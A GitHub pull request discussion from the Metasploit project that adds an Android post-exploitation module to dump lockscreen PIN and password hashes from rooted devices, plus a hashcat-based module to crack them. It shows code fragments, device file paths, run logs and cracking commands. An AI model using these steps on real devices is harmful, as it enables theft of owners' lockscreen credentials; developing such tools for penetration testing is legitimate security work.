Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Android hashdumper #12497

Merged
merged 9 commits into from Nov 15, 2019
Merged

Android hashdumper #12497

merged 9 commits into from Nov 15, 2019

Conversation

@h00die
Copy link
Contributor

h00die commented Oct 27, 2019

@timwr requested I put up a WIP PR on this.
This PR creates an android hashdump function. root is required, the hash and salt are in 2 different places. From my testing, it wasn't enough to pull the .db file, I had to pull the other 2 supporting files. When saving them to loot though, they get renamed, which then sqlite3 didn't like them, so I had to 'work around' the issue which took more hours than I care to admit to.
Untested, PIN and pattern are just all number passwords so this should get them as well

Samsung Galaxy S3 4.4.2

Shell + towelroot.

msf5 post(android/gather/hashdump) > rexploit
[*] Reloading module...

[!] SESSION may not be compatible with this module.
[*] Attempting to determine unsalted hash
[+] Saved password.key
[*] Attempting to determine salt
[*] OS Version: 4.4.2
[*] Attempting to load >=4.3.0 Android settings file
[+] Saved locksettings.db with length 4096
[+] Saved locksettings.db-wal with length 140112
[+] Saved locksettings.db-shm with length 32768
5381737017539487883
[+] Password Salt: 4aafc54dc502e88b
[+] SHA1: EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b
[-] Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank

Throw it to hashcat

# hashcat -m 5800 EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b /tmp/wordlist 
hashcat (v5.1.0) starting...

nvmlDeviceGetFanSpeed(): Not Supported

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=300 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=5 -D KERN_TYPE=5800 -D _unroll'
* Device #1: Kernel amp_a0.b9293e33.kernel not found in cache! Building may take a while...


Dictionary cache built:
* Filename..: /tmp/wordlist
* Passwords.: 1
* Bytes.....: 5
* Keyspace..: 1
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

ea8457de97836c955082ae77dbe2cd86a4e8bc0e:4aafc54dc502e88b:test
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Samsung Android Password/PIN
Hash.Target......: ea8457de97836c955082ae77dbe2cd86a4e8bc0e:4aafc54dc502e88b
Time.Started.....: Sun Oct 27 00:34:04 2019 (0 secs)
Time.Estimated...: Sun Oct 27 00:34:04 2019 (0 secs)
Guess.Base.......: File (/tmp/wordlist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       76 H/s (0.72ms) @ Accel:64 Loops:63 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1023
Candidates.#1....: test -> test
Hardware.Mon.#1..: Temp: 50c Util: 50% Core: 705MHz Mem:1400MHz Bus:16

Started: Sun Oct 27 00:34:02 2019
Stopped: Sun Oct 27 00:34:06 2019

I'd really like #11695 landed to write a cracker module for android.... but alas
I'm also running into DB errors when saving the result. something to do with the session bla bla bla.
Add docs
Test pin
Clean code
Also need to look into the state of hash identifier, not sure how valid it is vice whats in #11695 and update to make sure it works with this hash.

# hashid
EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b
Analyzing 'EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b'
[+] SHA-1 
[+] Double SHA-1 
[+] RIPEMD-160 
[+] Haval-160 
[+] Tiger-160 
[+] HAS-160 
[+] LinkedIn 
[+] Skein-256(160) 
[+] Skein-512(160) 
[+] Android PIN 
[+] Redmine Project Management Web App 
[+] SMF ≥ v1.1 
@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Oct 27, 2019

I'm also running into DB errors when saving the result. something to do with the session bla bla bla.

Perhaps you're running into this bug:

[-] Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank
[-] Call stack:
[-]   /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/validations.rb:79:in `raise_record_invalid'
[-]   /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/validations.rb:43:in `save!'

aka, the "you should have connected to the database before you got a session and now it's too late, unless you want to kill all your sessions" bug.

@h00die

This comment has been minimized.

Copy link
Contributor Author

h00die commented Oct 27, 2019

Don't believe so, I always have a db connected. But something to double check

modules/post/android/gather/hashdump.rb Outdated Show resolved Hide resolved
}
create_credential(credential_data)

if hash.length > 40

This comment has been minimized.

Copy link
@bcoles

bcoles Oct 27, 2019

Contributor

What does it mean if hash.length is smaller than 40 ?

modules/post/android/gather/hashdump.rb Outdated Show resolved Hide resolved
modules/post/android/gather/hashdump.rb Outdated Show resolved Hide resolved
@h00die h00die added the docs label Oct 28, 2019
@h00die

This comment has been minimized.

Copy link
Contributor Author

h00die commented Oct 28, 2019

@timwr I believe this is ready for you to check out.

  • If you have a pre 4.3 device, that code is untested, so I'd love for that part to be checked.
  • If you have a non-samsung, I wasn't able to test (I'll dig in my drawer later to see if i can find one) the MD5 part.
@h00die h00die added the msf5 label Oct 29, 2019
@h00die h00die changed the title WIP: Android hashdumper Android hashdumper Oct 29, 2019
@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 1, 2019

Works great on a 4.3 Samsung device (s3) :trollface:

msf5 post(android/gather/hashdump) > rexploit
[*] Reloading module...

[!] SESSION may not be compatible with this module.
[*] Attempting to determine unsalted hash.
[+] Saved password.key
[*] Attempting to determine salt
[*] OS Version: 4.3
[*] Attempting to load >= 4.3.0 Android settings file
[+] Saved locksettings.db with length 4096
[+] Saved locksettings.db-wal with length 131872
[+] Saved locksettings.db-shm with length 32768
[+] Password Salt: 26492efb92fecdbc
[+] SHA1: C6CA8A37C3662749326ACF38318C20855EFF6B18:26492efb92fecdbc
[+] Crack with: hashcat -m 5800 C6CA8A37C3662749326ACF38318C20855EFF6B18:26492efb92fecdbc
[*] Post module execution completed

It's not working on an Android 7 emulator (details soon).

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 9, 2019

It's possible I did something silly, but I tested on Android x86 (it's 4.3 non-samsung) from here:
https://code.google.com/archive/p/android-x86/downloads

It can correctly gather the hashes, but hashcat is unable to crack the passcode (1234):

[!] SESSION may not be compatible with this module.
[*] Attempting to determine unsalted hash.
[+] Saved password.key
[*] Attempting to determine salt
[*] OS Version: 4.3
[*] Attempting to load >= 4.3.0 Android settings file
[+] Saved locksettings.db with length 4096
[+] Saved locksettings.db-wal with length 148352
[+] Saved locksettings.db-shm with length 32768
[+] Password Salt: 697ea5724a1a9d50
[+] SHA1: 6FCECCEF19F7300509524661FB153C18E44EF3D5:697ea5724a1a9d50
[+] Crack with: hashcat -m 5800 6FCECCEF19F7300509524661FB153C18E44EF3D5:697ea5724a1a9d50
[+] MD5: 2B01F20E38182A831A589444FABB65EF:697ea5724a1a9d50

@h00die

This comment has been minimized.

Copy link
Contributor Author

h00die commented Nov 9, 2019

One thing i've noticed is that the salt can be a negative value, so i'll be patching that shortly.

@h00die h00die force-pushed the h00die:android_hashdump branch from 683b4ba to f8ef7a8 Nov 9, 2019
@h00die

This comment has been minimized.

Copy link
Contributor Author

h00die commented Nov 9, 2019

Added a crack_mobile module. I'm seeing what youre seeing though, PIN isn't getting cracked for some strange reason. Was working previously, will work more with it to see what I can figure out.

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 10, 2019

Great work! Let me know if this needs to be rebased on top of your password cracker overhaul

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 12, 2019

Now I'm getting: [-] Unable to pull salt from database. Command output: 585409830931257029
Removing the length check I get:

[*] Attempting to determine unsalted hash.
[+] Saved password.key
[*] Attempting to determine salt
[*] OS Version: 4.3
[*] Attempting to load >= 4.3.0 Android settings file
[+] Saved locksettings.db with length 4096
[+] Saved locksettings.db-wal with length 148352
[+] Saved locksettings.db-shm with length 32768
[+] Password Salt: 81fcb23bcadd6c5
[+] SHA1: 9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5
[+] Crack with: hashcat -m 5800 9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5
[+] MD5: 1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5

But I'm still unable to crack it. Let me test 4.2

print_status('Attempting to determine salt')
os = cmd_exec("getprop ro.build.version.release")
vprint_status("OS Version: #{os}")
if Gem::Version.new(os) < Gem::Version.new('4.3.0')

This comment has been minimized.

Copy link
@timwr

timwr Nov 12, 2019

Contributor

I'm testing on a 4.2.2 device (android x86) and the salt is still in /data/system/locksettings.db. Let me try older versions until I can find one where it's in /data/data/com.android.providers.settings/databases/settings.db

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 12, 2019

Please see: h00die#14

end

salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative, therefore 20 char
unless salt.to_s.length.between?(19,20)

This comment has been minimized.

Copy link
@timwr

timwr Nov 12, 2019

Contributor

I think we should take this out, as it always seem to fail for me

sha1 = hash[0...40]
sha1 = "#{sha1}:#{salt}"
print_good("SHA1: #{sha1}")
print_good("Crack with: hashcat -m 5800 #{sha1}")

This comment has been minimized.

Copy link
@timwr

timwr Nov 12, 2019

Contributor

From my very limited testing it's 5800 on Samsung devices, and -m 110 on everything else?

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 12, 2019

I tested this on 4.3 Android x86, and it seems to work if:

  • h00die#14
  • Remove the unless salt.to_s.length.between?(19,20) check
  • Do hashcat -m 110

e.g:

[!] SESSION may not be compatible with this module.
[*] Attempting to determine unsalted hash.
[+] Saved password.key
[*] Attempting to determine salt
[*] OS Version: 4.3
[*] Attempting to load lockscreen db: /data/system/locksettings.db
[+] Saved locksettings.db with length 4096
[+] Saved locksettings.db-wal with length 148352
[+] Saved locksettings.db-shm with length 32768
[+] Password Salt: 81fcb23bcadd6c5
[+] SHA1: 9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5
[+] Crack with: hashcat -m 5800 9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5
[+] MD5: 1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5
[*] Post module execution completed

hashcat -m 110 9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 --force wordlistcontaining1234 (--force is needed for my hashcat/computer)
9860a48ca459d054f3fef0f8518cf6872923dae2:81fcb23bcadd6c5:1234

fallback to settings.db if locksettings.db does not exist
@h00die h00die changed the title Android hashdumper WIP: Android hashdumper Nov 13, 2019
@h00die

This comment has been minimized.

Copy link
Contributor Author

h00die commented Nov 13, 2019

Fixed the negative bug, good find. Confirmed that worked. Wrote docs for the cracker, and fixed a bug where it wasn't finding the cracked password correctly.

Re-added WIP for the following:

  • Need to test non-samsung hashes (9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5)
  • Need to test MD5, and add it to the cracker list and other associated cracker things (1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5)
end

print_status('Attempting to determine unsalted hash.')
key_file = '/data/system/password.key'

This comment has been minimized.

Copy link
@timwr

timwr Nov 13, 2019

Contributor

I think we could gather the key after the hash, and check for /data/system/password.key, /data/system/gesture.key and /data/system/sparepassword.key
Not sure if we need that before landing what's working currently though

This comment has been minimized.

Copy link
@h00die

h00die Nov 14, 2019

Author Contributor

lets deal with these things later, this is already a lot of code adds and its working pretty good already

@timwr
timwr approved these changes Nov 13, 2019
Copy link
Contributor

timwr left a comment

The hashdump part is working nicely btw

@h00die

This comment has been minimized.

Copy link
Contributor Author

h00die commented Nov 14, 2019

Password cracking working for samsung, non-samsung, and md5 now.

msf5 > creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1
msf5 > creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1
msf5 > creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5
msf5 > use auxiliary/analyze/crack_mobile
msf5 auxiliary(analyze/crack_mobile) > set DeleteTempFiles false
DeleteTempFiles => false
msf5 auxiliary(analyze/crack_mobile) > run

[+] hashcat Version Detected: v5.1.0
[*] Hashes Written out to /tmp/hashes_tmp20191113-29506-1xydi7
[*] Wordlist file written out to /tmp/jtrtmp20191113-29506-aq6ph7
[*] Checking android-sha1 hashes already cracked...
[*] Cracking android-sha1 hashes in pin mode...
[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
nvmlDeviceGetFanSpeed(): Not Supported

[*] Cracking android-sha1 hashes in incremental mode...
[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
nvmlDeviceGetFanSpeed(): Not Supported

[*] Cracking android-sha1 hashes in wordlist mode...
[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
nvmlDeviceGetFanSpeed(): Not Supported

[+] Cracked Hashes
==============

 DB ID  Hash Type     Username     Cracked Password  Method
 -----  ---------     --------     ----------------  ------
 127    android-sha1  androidsha1  1234              Pin

[*] Checking android-samsung-sha1 hashes already cracked...
[*] Cracking android-samsung-sha1 hashes in pin mode...
[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
nvmlDeviceGetFanSpeed(): Not Supported

[*] Cracking android-samsung-sha1 hashes in incremental mode...
[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
nvmlDeviceGetFanSpeed(): Not Supported

[*] Cracking android-samsung-sha1 hashes in wordlist mode...
[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
nvmlDeviceGetFanSpeed(): Not Supported

[+] Cracked Hashes
==============

 DB ID  Hash Type             Username     Cracked Password  Method
 -----  ---------             --------     ----------------  ------
 126    android-samsung-sha1  samsungsha1  1234              Pin
 127    android-sha1          androidsha1  1234              Pin

[*] Checking android-md5 hashes already cracked...
[*] Cracking android-md5 hashes in pin mode...
[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
nvmlDeviceGetFanSpeed(): Not Supported

[*] Cracking android-md5 hashes in incremental mode...
[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
nvmlDeviceGetFanSpeed(): Not Supported

[*] Cracking android-md5 hashes in wordlist mode...
[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
nvmlDeviceGetFanSpeed(): Not Supported

[+] Cracked Hashes
==============

 DB ID  Hash Type             Username     Cracked Password  Method
 -----  ---------             --------     ----------------  ------
 126    android-samsung-sha1  samsungsha1  1234              Pin
 127    android-sha1          androidsha1  1234              Pin
 128    android-md5           androidmd5   1234              Pin

[*] Auxiliary module execution completed

@h00die

This comment has been minimized.

Copy link
Contributor Author

h00die commented Nov 14, 2019

Hash dumper is now picking up if its a samsung or not, storing and processing the hash in hashdumper correctly. Samsung S4

resource (android.128.rb)> use post/android/gather/hashdump
resource (android.128.rb)> set session 2
session => 2
resource (android.128.rb)> set verbose true
verbose => true
resource (android.128.rb)> run

[!] SESSION may not be compatible with this module.
[*] Attempting to determine unsalted hash.
[+] Saved password.key
[*] Attempting to determine salt
[*] OS Version: 4.4.2
[*] Attempting to load lockscreen db: /data/system/locksettings.db
[+] Saved locksettings.db with length 4096
[+] Saved locksettings.db-wal with length 140112
[+] Saved locksettings.db-shm with length 32768
[+] Password Salt: a006983800cc3dd1
[+] SHA1: D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1
[*] Post module execution completed
resource (android.128.rb)> use auxiliary/analyze/crack_mobile
resource (android.128.rb)> set verbose false
verbose => false
resource (android.128.rb)> set ShowCommand false
ShowCommand => false
resource (android.128.rb)> rm /root/.msf4/john.pot
[*] exec: rm /root/.msf4/john.pot

resource (android.128.rb)> run
[+] hashcat Version Detected: v5.1.0
[*] Hashes Written out to /tmp/hashes_tmp20191113-29936-1vxuj8n
[*] Wordlist file written out to /tmp/jtrtmp20191113-29936-1oq2lz2
[*] Checking android-samsung-sha1 hashes already cracked...
[*] Cracking android-samsung-sha1 hashes in pin mode...
nvmlDeviceGetFanSpeed(): Not Supported

[*] Cracking android-samsung-sha1 hashes in incremental mode...
nvmlDeviceGetFanSpeed(): Not Supported

[*] Cracking android-samsung-sha1 hashes in wordlist mode...
nvmlDeviceGetFanSpeed(): Not Supported

[+] Cracked Hashes
==============

 DB ID  Hash Type             Username  Cracked Password  Method
 -----  ---------             --------  ----------------  ------
 132    android-samsung-sha1            1234              Pin

[*] Auxiliary module execution completed
msf5 auxiliary(analyze/crack_mobile) > creds
Credentials
===========

host  origin        service  public  private                                                    realm  private_type        JtR Format
----  ------        -------  ------  -------                                                    -----  ------------        ----------
      111.111.1.11                   D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1         Nonreplayable hash  android-samsung-sha1
                                     1234                                                              Password            
@h00die h00die changed the title WIP: Android hashdumper Android hashdumper Nov 14, 2019
@h00die

This comment has been minimized.

Copy link
Contributor Author

h00die commented Nov 14, 2019

@timwr ready for your final check!

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 15, 2019

Works nicely on 4.3 (non-samsung)

timwr added a commit that referenced this pull request Nov 15, 2019
@timwr timwr merged commit 8b8c70b into rapid7:master Nov 15, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 15, 2019

Also working on a 4.3 Samsung device. Excellent work @h00die

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 15, 2019

Release Notes

This adds a new module to gather PIN/passcode hashes from a root session on an Android device. This also adds an auxiliary module to crack hashes gathered from an Android device using hashcat.

@h00die h00die deleted the h00die:android_hashdump branch Nov 17, 2019
h00die added a commit to h00die/metasploit-framework that referenced this pull request Nov 17, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.